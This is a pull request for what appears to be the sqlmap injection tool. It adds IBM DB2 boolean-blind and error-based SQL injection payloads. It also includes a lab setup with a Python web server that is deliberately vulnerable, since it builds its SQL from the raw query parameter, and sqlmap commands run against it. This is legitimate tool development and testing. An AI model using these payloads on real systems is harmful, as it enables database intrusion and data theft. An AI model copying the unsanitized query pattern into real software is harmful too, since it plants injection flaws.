### PR TITLE
Support for DB2 error based and blind

### DIFF
--- a/data/xml/payloads/boolean_blind.xml
+++ b/data/xml/payloads/boolean_blind.xml
@@ -1532,4 +1532,24 @@ Tag: <test>
         </details>
     </test>
     <!-- End of boolean-based blind tests - Stacked queries -->
+    
+    <test>
+        <title>IBM DB2 boolean-based blind - ORDER BY (append)</title>
+        <stype>1</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,(SELECT CASE WHEN [INFERENCE] THEN 1 ELSE RAISE_ERROR(70001,2) END FROM SYSIBM.SYSDUMMY1)</vector>
+        <request>
+            <payload>,(SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE RAISE_ERROR(70001,2) END FROM SYSIBM.SYSDUMMY1)</payload>
+        </request>
+        <response>
+            <comparison>,(SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE RAISE_ERROR(70001,2) END FROM SYSIBM.SYSDUMMY1)</comparison>
+        </response>
+        <details>
+            <dbms>IBM DB2</dbms>
+        </details>
+      </test>
+    
 </root>

--- a/data/xml/payloads/error_based.xml
+++ b/data/xml/payloads/error_based.xml
@@ -1321,4 +1321,22 @@
         </details>
     </test>
     <!-- End of error-based tests - stacking -->
+    <test>
+        <title>IBM DB2 - Error Based </title>
+        <stype>2</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1-8</clause>
+        <where>1,2,3</where>
+        <vector>,(SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN RAISE_ERROR('70001',CONCAT('[DELIMITER_START]',CONCAT(([QUERY]),'[DELIMITER_STOP]'))) ELSE 1 END FROM SYSIBM.SYSDUMMY1)</vector>
+        <request>
+            <payload>,(SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN RAISE_ERROR('70001',CONCAT('[DELIMITER_START]',CONCAT((SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE 2 END FROM SYSIBM.SYSDUMMY1),'[DELIMITER_STOP]'))) ELSE 1 END FROM SYSIBM.SYSDUMMY1)</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>IBM DB2</dbms>
+        </details>
+    </test>
 </root>


### PR DESCRIPTION
Hello,

We recently encountered an injection on a DB2 database during a penetration test at Synacktiv. We've put together two techniques for DB2 :
- IBM DB2 boolean-based blind - ORDER BY (append)
- IBM DB2 error-based

I'm not so sure if the `<where>` and `<clause>` will cover every cases.

Please find below how to test it :
```
$ sudo docker run -itd --name mydb2 --privileged=true -p 50000:50000 -e LICENSE=accept -e DB2INST1_PASSWORD=passwd -e DBNAME=testdb -v /home/dzeta/projects/sqlmap_db2/db:/database ibmcom/db2
$ sudo docker exec -ti mydb2 bash -c "su - db2inst1"
$ cat <<EOF | db2
CONNECT TO testdb
CREATE TABLE users (username VARCHAR(150) NOT NULL,email VARCHAR(150) NOT NULL)
INSERT INTO users VALUES ('James', 'james@bond.com')
INSERT INTO users VALUES ('Bill', 'bill@gates.com')
INSERT INTO users VALUES ('Alfred', 'cave@batman.com')
EOF
$ exit

$ pip3 install --user ibm-db

$ cat >connect.py <<EOF
#!/usr/bin/env python3

import ibm_db_dbi as db

from http.server import HTTPServer, BaseHTTPRequestHandler
from urllib import parse
from urllib.parse import parse_qs
import traceback

PORT = 8000

conn = db.connect("DATABASE=testdb;HOSTNAME=127.0.0.1;PORT=50000;PROTOCOL=TCPIP;UID=DB2INST1;PWD=passwd;", "", "")

class SimpleHTTPRequestHandler(BaseHTTPRequestHandler):

    def do_GET(self):
        message = ""
        parsed_path = parse.urlparse(self.path)
        query = parse_qs(parsed_path.query)
        if len(query) <= 0:
            val = 'username'
        else:
            val = query['q'][0]

        try:
            cursor = conn.cursor()
            sql = f"SELECT * FROM users WHERE username LIKE '%' ORDER BY {val} ASC"
            cursor.execute(sql)
            for r in cursor.fetchall():
                message += f"{r[0]} : {r[1]} <br>\r\n"
            self.send_response(200)
            self.end_headers()
        except Exception as e:
            self.send_response(500)
            self.end_headers()
            message += ''.join(traceback.format_exc())
        message += '\r\n'
        self.wfile.write(message.encode('utf-8'))

httpd = HTTPServer(('localhost', 8000), SimpleHTTPRequestHandler)
httpd.serve_forever()
EOF

$ python3 connect.py

$ ./sqlmap.py -p q --dbms "IBM DB2" --level 5 --risk 3 --batch -u http://localhost:8000/?q=username --technique=E -b
$ ./sqlmap.py -p q --dbms "IBM DB2" --level 5 --risk 3 --batch -u http://localhost:8000/?q=username --technique=B -b
```

